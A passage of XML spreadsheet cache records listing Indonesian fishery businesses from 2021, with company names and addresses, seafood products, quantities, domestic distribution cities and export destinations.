    <n v="25408"/>
    <x v="1173"/>
    <s v="IWA-QU"/>
    <s v="Jl. Rd. Perang No.71 RT 009, Kel. Pematang Sulur, Kec. Telanaipura, Kota Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Krispy Kulit dan Sirip Ikan Gabus"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25409"/>
    <x v="1173"/>
    <s v="IWA-QU"/>
    <s v="Jl. Rd. Perang No.71 RT 009, Kel. Pematang Sulur, Kec. Telanaipura, Kota Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Kerupuk Tulang Ikan"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="300"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25410"/>
    <x v="1173"/>
    <s v="IWA-QU"/>
    <s v="Jl. Rd. Perang No.71 RT 009, Kel. Pematang Sulur, Kec. Telanaipura, Kota Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Dendeng Ikan"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25413"/>
    <x v="1174"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Jl. Sapta Marga Blok B No. 100 RT 013 RW 003, Kel. Guntung Payung, Kec. Landasan Ulin, Kota Banjar Baru&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Ikan Pelagis Segar (Teri, Baby Tuna, Tongkol, Kembung, Marlin, Layang)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates"/>
  </r>
  <r>
    <n v="25414"/>
    <x v="1174"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Jl. Sapta Marga Blok B No. 100 RT 013 RW 003, Kel. Guntung Payung, Kec. Landasan Ulin, Kota Banjar Baru&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Ikan Demersal Segar (Bawal, Kerapu, Layur, Kakap)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, United Arab Emirates"/>
  </r>
  <r>
    <n v="25415"/>
    <x v="1175"/>
    <s v="PT. SURI TANI PEMUKA PLANT 1"/>
    <s v="Jl. Mundu Pesisir No. 33 KM 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="Indonesia, Japan"/>
  </r>
  <r>
    <n v="25416"/>
    <x v="1175"/>
    <s v="PT. SURI TANI PEMUKA PLANT 1"/>
    <s v="Jl. Mundu Pesisir No. 33 KM 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="Indonesia, Japan"/>
  </r>
  <r>
    <n v="25417"/>
    <x v="1175"/>
    <s v="PT. SURI TANI PEMUKA PLANT 1"/>
    <s v="Jl. Mundu Pesisir No. 33 KM 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="969154"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung Barat, Kota Bandung, Kota Bekasi, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="25418"/>
    <x v="1152"/>
    <s v="PT, MARINA LAUTAN SEJAHTERA FISHERY"/>
    <s v="Jl, Raya Salembaran, Pergudangan Royal Kosambi Blok D6 (Room 1), Kel, Cengklong, Kec, Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Bandeng Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Japan, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25419"/>
    <x v="1176"/>
    <s v="PT. MBEGOR JAYA MANDIRI"/>
    <s v="Jl. Kertanegara No.18, Kel. Jember Kidul, Kec. Kaliwates, Kabupaten Jember&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sambal Ikan"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="240"/>
    <s v="Kabupaten Jember"/>
    <s v="Hong Kong, Turkey"/>
  </r>
  <r>
    <n v="25422"/>
    <x v="1177"/>
    <s v="DUO AYU SEHATI"/>
    <s v="Jl. Air Mawar RT 03 RW 02, Kel. Air Mawar, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Getas Ikan, Getas Cumi-cumi"/>
    <d v="2021-05-05T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Pangkal Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="25423"/>
    <x v="1177"/>
    <s v="DUO AYU SEHATI"/>
    <s v="Jl. Air Mawar RT 03 RW 02, Kel. Air Mawar, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kerupuk Telur Cumi-Cumi"/>
    <d v="2021-05-05T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Palembang, Kota Pangkal Pinang, Kota Batam, Kota Jakarta Pusat, Kota Bandung"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25424"/>
    <x v="1177"/>
    <s v="DUO AYU SEHATI"/>
    <s v="Jl. Air Mawar RT 03 RW 02, Kel. Air Mawar, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kemplang Ikan"/>
    <d v="2021-05-05T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Palembang, Kota Pangkal Pinang, Kota Jakarta Pusat, Kota Bandung"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25433"/>
    <x v="625"/>
    <s v="PT, ANEKA SUMBER TATA BAHARI"/>
    <s v="Jl, Hurnala II, Kel, Tulehu, Kec, Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="266000"/>
    <s v="Kota Surabaya"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25435"/>
    <x v="1151"/>
    <s v="SUDIRMAN"/>
    <s v="Gg. Murni Barek Motor RT 001 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-05-20T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25436"/>
    <x v="1151"/>
    <s v="SUDIRMAN"/>
    <s v="Gg. Murni Barek Motor RT 001 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2021-05-20T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25437"/>
    <x v="1151"/>
    <s v="SUDIRMAN"/>
    <s v="Gg. Murni Barek Motor RT 001 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Jahan, Jebung, Kaci-kaci)"/>
    <d v="2021-05-20T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25438"/>
    <x v="1178"/>
    <s v="PT. KELOLA MINA LAUT UNIT CIREBON"/>
    <s v="Jl. Raya Cirebon - Losari KM 28, Kel. Malakasari, Kec. Gebang, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="180000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25442"/>
    <x v="1179"/>
    <s v="PT. INDOHAMAFISH"/>
    <s v="Jl. Gatot Kaca No.86, Kel. Pengambengan, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Sarden Kaleng, Makerel Kaleng"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="3600000"/>
    <s v="Kota Bandar Lampung, Kabupaten Cirebon, Kabupaten Sumedang, Kabupaten Malang, Kota Surabaya, Kota Pontianak, Kota Banjarmasin, Kota Manado, Kota Palu, Kabupaten Toraja Utara, Kota Makassar, Kabupaten Sorong"/>
    <s v="South Africa"/>
  </r>
  <r>
    <n v="25443"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Segar"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="1440000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25444"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Lemuru, Tongkol, Kuwe, Tembang)"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="1560000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25445"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Swanggi, Gulama, Lencam, Sebelah)"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="1560000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25446"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="1200000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25447"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Rajungan Segar"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25448"/>
    <x v="1181"/>
    <s v="PT. TRIRATU MUKTI KENCANA"/>
    <s v="Yos Sudarso No. 275, Kel. Garuntang, Kec. Bumi Waras, Kota Bandar Lampung&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-06-03T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Bandar Lampung"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="25449"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kepiting Rebus Beku"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="1320000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25450"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kerang Beku"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="1320000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25451"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Kering"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="180000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25452"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="25453"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="25454"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Beku"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="25455"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Lencam)"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="25456"/>
    <x v="1180"/>
    <s v="PT. SUMATERA OCEAN TRANSINDO"/>
    <s v="Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Semar, Salem, Cakalang, Tenggiri)"/>
    <d v="2021-06-17T00:00:00"/>
    <n v="800000"/>
    <s v="Kabupaten Langkat, Kabupaten Batu Bara, Kota Sibolga, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Binjai"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="25459"/>
    <x v="1182"/>
    <s v="PT. SUMBER REJEKI BERKAH LAUTAN INDONESIA"/>
    <s v="Jl. Magepanda KM 10 RT 012 RW 004, Kel. Hewuli, Kec. Alok Barat, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Tuna Beku"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="40000"/>
    <s v="Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Denpasar"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="25460"/>
    <x v="1182"/>
    <s v="PT. SUMBER REJEKI BERKAH LAUTAN INDONESIA"/>
    <s v="Jl. Magepanda KM 10 RT 012 RW 004, Kel. Hewuli, Kec. Alok Barat, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Tuna Segar"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="25461"/>
    <x v="1182"/>
    <s v="PT. SUMBER REJEKI BERKAH LAUTAN INDONESIA"/>
    <s v="Jl. Magepanda KM 10 RT 012 RW 004, Kel. Hewuli, Kec. Alok Barat, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Lemuru, Tongkol, Deho, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="390000"/>
    <s v="Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="25462"/>
    <x v="1183"/>
    <s v="PT. BUMI LAUT PERTIWI"/>
    <s v="Jl. A. Mappainga Barombong, Kel. Barombong, Kec. Tamalate, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-06-28T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25465"/>
    <x v="1184"/>
    <s v="PT. MEGA CITRA KARYA"/>
    <s v="Jl. Ir. Sutami No.1, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-05-05T00:00:00"/>
    <n v="6200000"/>
    <m/>
    <s v="Chile, China, Korea, Democratic People's Republic of, Spain"/>
  </r>
  <r>
    <n v="25469"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Republic of, Malaysia, Saudi Arabia, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25470"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25471"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Pisang-pisang, Kuniran, Kerapu, Sukang, Kakatua, Bawal, Kakap Merah)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="Australia, Brunei Darussalam, China, Japan, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25472"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Pisang-Pisang, Kuniran, Kerapu, Sukang, Kakatua, Bawal)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="Australia, Brunei Darussalam, China, Japan, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25473"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="350000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25474"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25481"/>
    <x v="1185"/>
    <s v="SIALANG CUPU GADING"/>
    <s v="Jl. Candi Muaro Jambi RT 03, Kel. Tunas Baru, Kec. Sekernan, Kabupaten Muaro Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Abon Lele"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25482"/>
    <x v="1185"/>
    <s v="SIALANG CUPU GADING"/>
    <s v="Jl. Candi Muaro Jambi RT 03, Kel. Tunas Baru, Kec. Sekernan, Kabupaten Muaro Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Krispy Kulit Lele"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25483"/>
    <x v="1185"/>
    <s v="SIALANG CUPU GADING"/>
    <s v="Jl. Candi Muaro Jambi RT 03, Kel. Tunas Baru, Kec. Sekernan, Kabupaten Muaro Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Kerupuk Lele"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25484"/>
    <x v="1185"/>
    <s v="SIALANG CUPU GADING"/>
    <s v="Jl. Candi Muaro Jambi RT 03, Kel. Tunas Baru, Kec. Sekernan, Kabupaten Muaro Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Kerupuk Tulang Lele"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="300"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25485"/>
    <x v="1185"/>
    <s v="SIALANG CUPU GADING"/>
    <s v="Jl. Candi Muaro Jambi RT 03, Kel. Tunas Baru, Kec. Sekernan, Kabupaten Muaro Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Nila Krispy"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="300"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25486"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Segar"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25487"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Perut Ikan Segar"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="1500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25488"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Air Tawar Segar"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Hong Kong, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25489"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Segar"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25490"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Scallop Segar"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25492"/>
    <x v="148"/>
    <s v="PT. LINTAS LAUT SAMUDERA"/>
    <s v="Executive Industrial Park Blok A3 No.11, Kel. Belian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Tempura Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="300"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="25508"/>
    <x v="1099"/>
    <s v="PT. ARTI BUANA LAUTAN INDONESIA"/>
    <s v="Jl. Sabutung No.3, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Teri, Tongkol, Terbang, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates"/>
  </r>
  <r>
    <n v="25509"/>
    <x v="1099"/>
    <s v="PT. ARTI BUANA LAUTAN INDONESIA"/>
    <s v="Jl. Sabutung No.3, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Pisang-pisang, Kerapu, Layur, Sukang, Kakap, Ekor Kuning)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates"/>
  </r>
  <r>
    <n v="25510"/>
    <x v="1099"/>
    <s v="PT. ARTI BUANA LAUTAN INDONESIA"/>
    <s v="Jl. Sabutung No.3, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates"/>
  </r>
  <r>
    <n v="25511"/>
    <x v="1099"/>
    <s v="PT. ARTI BUANA LAUTAN INDONESIA"/>
    <s v="Jl. Sabutung No.3, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates"/>
  </r>
  <r>
    <n v="25513"/>
    <x v="1099"/>
